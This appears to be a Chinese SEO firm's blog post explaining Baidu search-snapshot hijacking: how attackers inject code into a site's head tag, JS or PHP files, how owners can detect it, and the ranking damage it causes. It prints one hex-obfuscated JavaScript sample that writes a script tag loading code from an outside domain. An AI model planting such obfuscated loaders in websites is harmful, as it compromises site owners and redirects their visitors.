快速排名 提升权重
当前位置:首页 > 行业动态/ SEO基础/ 什么是百度快照劫持?云无限优化网站认为
什么是百度快照劫持?云无限优化网站认为
时间: 2017-11-21 浏览人数: 602


 

 

 

什么是百度快照劫持?怎样检查快照是否被劫持?我云无限优化网站公司认为,百度快照劫持就是黑客通过技术手段拿到你网站FTP权限或者数据库权限植入代码或添加劫持脚本,把他想要的内容写进一个页面代码里,在首页Head标签下调用,当搜索引擎访问你网站的时候抓取到你网站的标题-关键词-描述的时候,就会抓取到黑客设定的任何内容!

  

百度快照劫持主要表达形式

   当我们在百度搜索框,搜索网站关键词,查找对应的快照是,点进去,网站会被跳转到其他网站上。当你的网站快照长时间被劫持时,你所搜索的网站快照会被百度抓却成,被跳转到网站的快照。

  深圳搬家网站网站快照

深圳搬家网站网站快照

点解网站快照被跳转的网站  

点解网站快照被跳转的网站

 

常见的劫持方法

1.放到<head>标签

网站设计中<head>标签里面有标题、描述、关键词等内容,这部分是明显写上去的,如果是写到生成后的静态首页html文件里,每次更新首页都会消失。但如果不久后又被修改了,就有可能是通过其他木马定时修改的,要注意找出来。

       DedeCMS为例,有些文件夹是禁止执行脚本的,所以能修改你的文件肯定在能执行的文件夹内,如果对文件结构不是很熟悉的,可以和官方的文件夹进行对比就能找出问题所在。

 

2.伪装JS文件、修改PHP文件

这个你一定经历过,比如DedeCMS的版权信息,如果你用{dede:global.cfg_poweby/},后面都会加上自带的织梦链接;下载的模板会在友情链接里面加入模板开发者的友情链接,这些链接是在模板里面看不到的,每次刷新位置都不一样。

  需要注意的是,浏览器并不识别JS脚本,我云无限*上海网站优化公司发现如果用JS的方式插入链接,在查看源代码里面是完全看不到具体内容的。其实这个方法也并不高级,常见的如:

<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>

       js文件里面有类似这样的代码:

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];

 

document.writeln(_$[0]);

   第一句是通过加密的代码,第二句输出内容,一般服务器做特殊处理,才能输出正确的内容,所以应该还有一些PHP文件。

  PHP有许多包含的写法,比如/include文件夹,在核心的PHP文件里面加入劫持代码,神不知鬼不觉。

  上面的方法都是比较常见的,一般的CMS有一定的防护能力,只要自己的数据库、服务器密码不泄露,这些都能及时解决。

 

百度快照劫持检查方法

1. 百度搜索框搜索对应关键词,查找对应快照点进去查看是否网站被跳转。

2. 查看我网站源码,在<head>标签里,<title>标签是否多出来一个?如下图,网站快照已被劫持。

     网站劫持代码

3. 运用云无限*优化网站公司开发的云优化软件,查看百度快照是否异常,如果异常点解查看详情,如下图所示,你的网站已被劫持。

云优化软件 

网站TDK对比 

 

百度快照劫持的危害

1. 造成网站快照异常,降低百度评分,照成网站关键词排名下滑。甚至归零。

2. 百度快照劫持往往会被跳转到灰色站,容易被百度误判风险网站,非法网站,照成网站被惩罚。

3. 降低客户体验度,照成大量网站流量流失。是你的影响归零。

 

 

友情链接